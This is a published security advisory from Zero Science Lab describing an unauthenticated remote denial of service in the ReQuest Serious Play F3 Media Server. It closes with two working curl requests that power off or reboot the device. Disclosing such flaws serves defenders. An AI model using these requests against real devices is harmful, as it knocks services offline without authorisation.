ReQuest Serious Play F3 Media Server 7.0.3 Denial Of Service

2020.10.19
mk LiquidWorm (MK) mk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service Vendor: ReQuest Serious Play LLC Product web page: http://www.request.com Affected version: 7.0.3.4968 (Pro) 7.0.2.4954 6.5.2.4954 6.4.2.4681 6.3.2.4203 2.0.1.823 Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers into a compact powerhouse. With the ability to add unlimited NAS devices, the F3 can handle your entire family's media collection with ease. Desc: The device can be shutdown or rebooted by an unauthenticated attacker when issuing one HTTP GET request. Tested on: ReQuest Serious Play® OS v7.0.1 ReQuest Serious Play® OS v6.0.0 Debian GNU/Linux 5.0 Linux 3.2.0-4-686-pae Linux 2.6.36-request+lenny.5 Apache/2.2.22 Apache/2.2.9 PHP/5.4.45 PHP/5.2.6-1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2020-5601 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php 01.08.2020 -- $ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff $ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top